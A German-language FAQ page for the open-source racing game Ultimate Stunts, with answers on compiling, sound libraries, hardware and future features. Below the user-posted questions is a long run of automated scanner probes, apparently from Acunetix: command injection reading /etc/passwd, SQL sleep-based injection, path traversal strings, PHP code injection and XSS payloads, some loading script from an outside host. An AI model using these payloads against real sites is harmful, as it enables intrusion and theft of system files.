Czech Danish Dutch English French German Hungarian Italian Norwegian Polish Portuguese Brasilian Portuguese Romanian Serbian Spanish Swedish
Warning: this translated page is older than the english page, so maybe it does not contain the most recent information. For the most recent information, we refer to the english page. If you want to help: you can maintain this translation on the Contribute Files section.

Frequently Asked Questions - Häufig gestellte Fragen

Hier findest du einige Antworten auf allgemeine Fragen zu Ultimate Stunts. Wenn du eine Frage hast, die hier nicht beantwortet wird, dann kannst du sie mit dem Eingabefeld am Ende der Seite stellen. Bitte stell dir Frage NUR in Englisch. Die Frage mit dazugehöriger Antwort wird zuerst in Englisch auf die Webseite gestellt und von den Übersetzern in die einzelnen Sprachen übersetzt. Wenn du deine Frage und deine Antwort, diese Seite oder die gesamte Ultimate Stunts Webseite in deiner Landessprache zur Verfügung haben möchtest, dann hilf mir bitte indem du die Contribute Seite benutzt.
(Über das Projekt)

Warum hast du mit diesem Projekt angefangen?

Gibt es eine Möglichkeit von dem Release einer neuen Version per Mail benachrichtigt zu werden?

Ja. Du solltest dir einen Account auf Sourceforge registrieren. Dann geh zur Projekt Seite von Ultimate Stunts und klick auf den weißen Briefumschlag neben dem Packet, das du beobachten willst.

Wie kann ich dir bei Ultimate Stunts helfen?

Das hängt von deinen Fähigkeiten ab. Wenn du beispielsweise Englisch und eine andere Sprache sprichst, dann kannst du eine Übersetzung dieser Seite machen oder überarbeiten (und später auch das Spiel). Wenn du künstlerische Talente wie das Erstellen von Musik, Sound Effekten, Texturen oder 3D-Models besitzt, dann kannst du mir damit helfen (bitte kontaktiere mich zuerst, damit ich dir sagen kann, was benötigt wird). Natürlich braucht Ultimate Stunts auch Programmierer. Solche mit Wissen über OpenGL, SDL, ODE, FMOD, OpenAL, Netzwerk Programmierung, Multithreadprogrammierung, physikalischer Simulation oder KI Programmierung sind sehr hilfreich.

Wird es eine Internet Seite geben auf die wir unsere Strecken/Kacheln/Autos hochladen können?

Im Moment kannst du mir deine Daten per Mail schicken. Wenn die Anzahl der Einsedungen stark ansteigt (was wahrscheinlich der Fall sein wird, wenn es einen guten Strecken Editor gibt), wird es eventuell eine Seite zum Austausch der Daten geben.
(Über das Kompilieren)

Welche Plattformen werden unterstützt?

Von der Theorie her jede UNIX-ähnliche Plattform mit OpenGL, SDL und BSD-Netzwerk-Sockets (FMOD sollte für den Sound verfügbar sein, aber kompilieren geht auch ohne). In der Praxis benötigt man entweder Cygwin unter Windows oder ein X-Window basiertes System. Plattformen, bei denen das Kompilieren bekannterweise funktioniert: Plattformen auf den das Kompilieren versucht wird (mit Problemen): h3>Wird es eine out-of-the-box kompilier Unterstützung für OS X geben? Ich hoffe doch. Unglücklicherweise habe ich kein OS X System somit kann ich keine Unterstützung für OS X entwickeln. Es sollte relativ einfach sein die configure.ac zu patchen und so OS X zu unterstützen. Dafür brauchst du nur Erfahrung mit autoconf und Kompilierungen. Ich denke nicht, dass irgendetwas im Source Code selber geändert werden muss.

Kann man die Windows Version in Wine unter Linux benutzen?

Es ist möglich Ultimate Stunts in Wine zu benutzen, auch mit Hardware-Beschleunigten Graphiken, aber der Sound könnte nicht funktionieren. Um Crashs zu verhindern, deaktiviere den Sound mit dem "nosound" Windowstreiber in der ultimatestunts.conf. (Anmerkung: Ultimate Stunts in Wine zu benutzen macht man nur zum Spaß; Linux Benutzer sollten besser den Sourcecode kompilieren).

Welche Sound Bibliotheken werden unterstützt?

Ultimate Stunts kann zwei Bibliotheken für die Sound-Ausgabe benutzen: FMOD und openAL. Die Entscheidung welche benutzt wird, wird von dem Konfigurationsskript beim kompilieren des Quell-Codes getroffen. Wenn openAL gefunden wird, wird dieses benutzt, wenn FMOD entdeckt wird, wird die Bibliothek benutzt, wenn nichts gefunden wird, dann wir ohne Ton-Unterstützung kompiliert. Beide Bibliotheken sind Multi-Plattform 3D Sound Bibliotheken, welche die plattformspezifischen Ausgabegeräte des Betriebssystems benutzen. So kann z.B. in Windows DirectSound benutzt werden und in Linux OSS oder Alsa.

Gibt es eine Möglichkeit Ultimate Stunts zu kompilieren und manche Bibliotheken an einem nicht standart Ort zu haben?

Eventuell klappt das hier:
export LDFLAGS="-Lhier_muss_dein_pfad_rein"
./configure
make

(Über das Benutzen)

Wohin kann ich die Daten installieren?

Du kannst die Daten irgendwo auf deinem System ablegen, solange die Variable datadir in ultimatestunts.conf darauf zeigt. Standardmäßig ist diese Variable "." in der Windows Version und "/usr/share/ultimatestunts" im Sourcecode Paket. Anmerkung: Die Datei ultimatestunts.conf selbst muss im "." Verzeichnis sein, also musst du Ultimate Stunts aus dem gleichen Verzeichnis starten, in dem die ultimatestunts.conf liegt.

Welches sind die Knöpfe innerhalb des Spiels (z.B. für die Kamera Kontrolle)?

Schau hier. Diese Dinge können und werden sich verändern in kommenden Versionen.

Wo kann ich online spielen?

Es gibt bis jetzt noch keinen zentralen Platz, an dem online Spieler finden kanst. Wenn du einen Spieler kennst, dann brauchst du die IP-Adresse oder den Hostnamen von einem von ihnen. Nun kannst du ein Netzwerk Spiel auf dem Computer hosten und von den anderen Computer verbinden. Das ist aber alles noch im alpha Stadium und somit könnte es Probleme machen...
(Über die Hardware)

Welche Hardware wird für Ultimate Stunts benötigt?

Um alle graphischen Fähigkeiten von Ultimate Stunts voll auskosten zu können, empfehlen wir folgende Hardware: Wenn du weniger Videospeicher hast, sinkt die Geschwindigkeit, weil die Texturen nicht in den Speicher passen und daher im Arbeitsspeicher ausgelagert werden. Das kann mit dem Senken der Texturgröße in der ultimatestunts.conf behoben werden. Wenn du alles auf ein Minimum in der ultimatestunts.conf setzt, sollte Ultimate Stunts auf dem folgenden System mehr oder weniger flüssig laufen: Die Geschwindigkeit wird hauptsächlich durch OpenGL eingeschränkt, also wenn du keine OpenGL Beschleunigung besitzt, wird das dein Hauptproblem sein. Du kannst Ultimate Stunts in einem sehr kleinen Fenster laufen lassen, um die Anzahle der einzelen Pro-Pixel-Operation für OpenGL zu reduzieren.

Gibt es bekannte Probleme mit Videohardware?

In der Vergangenheit gab es einige Probleme, welche aber mitlerweile gelöst sind. Ultimate Stunts wird fortführend getestet unter Microsoft's Software OpenGL, Mesa, einer ATI Radeon 9200 und einer NVIDIA Geforce 2. Es können neue Probleme mit dem Verbessern der Redering Engine auftreten, aber derzeit sind keine Probleme bekannt.

Kann ich einen Joystick oder vergleichbares benutzen?

Ja, denn Spieler, die Joystick-ähnliche Geräte benutzen, haben den Vorteil von proportionalem Steuern. Derzeit gibt es keine Pläne für Force Feedback Unterstüzung (weil ich mich damit nicht auskenne).
(Über die Zukunft)

Wird Ultimate Stunts einen Multiplayer Modus haben?

Ja, sowohl über Netzwerk als auch im Split-screen Modus. Es wird sogar möglich sein, beides zu mischen: zwei Spieler nehmen mittels Split-Screen auf einem Rechner an einem Netzwerkspiel teil.

Wird der Kachel-Editor Teile basierend (man hat Teile, die man rotieren, bewegen, skalieren, etc. kann) oder wie ein 3D Editor (du kannst Dateien aus einem 3D Modeller importieren) sein?

Er wird mehr wie ein 3D-Editor. Derzeit habe ich keine Pläne den Editor zu verbessern. Die Idee ist: Kacheln sind Teile, der Strecken-Editor wird ein Teile-basierter Editor. Das Programm stunts3dedit wird nichts mehr als ein benutzerfreundliches Tool um bekannte Dateiformate zu importieren und einige low-level Modifizierungen durchzuführen. Meines Erachtens sind nur Teile-basierte Editoren benutzerfreundlich für unerfahrene Nutzer. Der Strecken-Editor wird für andere nutzbar sein, das stunts3dedit wird es nicht.

Wird die Version 1.0 mit einem .sh Installer kommen?

In der Version 1.0 werde ich versuchen eine Instalation so einfach wie möglich zu machen. Ich werde ausserdem Packete für verschiedene Distributionen zur Verfügung stellen und vielleicht auch eine Live-CD für die Leute, die kein Linux instaliert haben :-)
(Über ein anderes Thema)

Wer bist du?

Ich bin ein 22 jähriger Student der angewandten Physik an der TU Delft. Wie die meisten Mitglieder von XTC, bin ich auch ein Mitglied beim C.S.R.-Delft, das eine christliche Studenten Vereinigung ist. Wenn es die Zeit zu lässt, arbeite ich gerne an Projekten wie Ultimate Stunts. Ich habe viel Programiererfahrung vorallem mit 3D Grafik, womit ich mit 13 Jahren angefanen habe, als ich Programieren in QBasic gelernt habe. Das erste wirklich interaktive Programm, das ich produziert hab, war ein Remake von Stunts in QBasic. Nach dem Spiel, welches ein "semi 3D" Spiel war, habe ich mehrere einfache Spiele, einen 3D Editor und immernoch in QBasic den Flugsimulator "Star Voyage", der später nach Visual Basic portiert wurde, entwickelt. Ich habe mehrere Jahre an dem Projekt gearbeitet (1997 - 2001) und es war sehr realistisch aber das Gameplay war langweilig. Zu dem Zeitpunkt habe ich mich an Stunts erinnert und das Ultimate Stunts Projekt gestartet.

Recently posted questions:

Are there any plans to add more cars?
  Yes, but adding a new car is a lot of work, so I won't add many cars in a single version.

hi, when i try to install the game i can extract and run ./configure but when i try make it gives "make: *** No targets specified and no makefile found.  Stop." what is wrong?
  The configure script is supposed to generate Makefiles. If they are not found, then I guess
  the configure script failed somewhere. Please have a look at the output of the configure
  script and read the documentation on how to compile Ultimate Stunts. If you can't figure it
  out on your own, please contact me.

Issue with non-us keyboard layout (fr) via ibus. I can not enter any number because required modifier (shift, numlock) are not taken.


There is the possibility of car mod?
Could you add the indy 500 car from the original stunts? I feel like the Formula 1 car is similar, but accelerates much faster making ramps very easy.
In the next version, put some trucks, buses, tanks, will get much more shocking game  I am Brazilian and I used google to translate
1
1
1
1
1
1
1
1
1
response.write(9890913*9107456)
1
'+response.write(9890913*9107456)+'
1
1
"+response.write(9890913*9107456)+"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1

 SomeCustomInjectedHeader:injected_by_wvs
1
1
1
1
1
1
1
1
1
1
1
${99414+100419}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1some_inexistent_file_with_long_name%00.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1&n948831=v990858
&cat /etc/passwd&
1
1
'&cat /etc/passwd&'
1
1
1
"&cat /etc/passwd&"
1
1
1
1
1
1
`cat /etc/passwd`
1
|cat /etc/passwd#
1
'|'ld
1
1
"|"ld
1
268435455
1 and sleep(4) 
;cat /etc/passwd;
1
h
1 or (sleep(4)+1) limit 1 -- 
';cat /etc/passwd;'
)
..
1' and sleep(4)='
";cat /etc/passwd;"
!(()&&!|*|*|
1e309
1' and (sleep(4)+1) limit 1 -- 
||cat /etc/passwd
1" and sleep(4)="
1
1
1' or (sleep(4)+1) limit 1 -- 
1
1
1
1
1" or (sleep(4)+1) limit 1 -- 
1
1'=sleep(4)='
1
1
1"=sleep(4)="
1
1;select pg_sleep(4); -- 
1
1
1
1
1
1';select pg_sleep(4); -- 
1; waitfor delay '0:0:4' -- 
1
1
1'; waitfor delay '0:0:4' -- 
'"()
1"; waitfor delay '0:0:4' -- 
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1
//www.acunetix.tst
1
1
1
1
1
1
1
1
1
1
1
;print(md5(acunetix_wvs_security_test));
1
1
1
1
1
1
../../../../../../../../../../etc/passwd
';print(md5(acunetix_wvs_security_test));$a='
1
1
'"
";print(md5(acunetix_wvs_security_test));$a="
1
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
<!--
1
1
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
acunetix_wvs_invalid_filename
index.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
index.php/.
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1
/etc/passwd
1
1
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1
................etc/passwd
1
1
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
1
file:///etc/passwd
1
1
/\../\../\../\../\../\../\../etc/passwd
1
1'"
'"()&%1<ScRiPt >prompt(921739)</ScRiPt>
\
OTMyODIz
undefined1<ScRiPt >prompt(974842)</ScRiPt>
JyI=
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942182></ScRiPt>
'"
<video><source onerror="javascript:prompt(999046)">
''""
1<div style=width:expression(prompt(924278))>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='991777'>
<body onload=prompt(991551)>
<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959297)>
<img src=xyz OnErRor=prompt(937262)>
1%3CScRiPt%20%3Eprompt(905257)%3C/sCripT%3E
<img acu onmouseover=prompt(932557) //>
<input autofocus onfocus=prompt(902298)>

Post a new question

English only please. This is not a proper place for bug reports, it's just for general questions that apply to more than just one specific situation.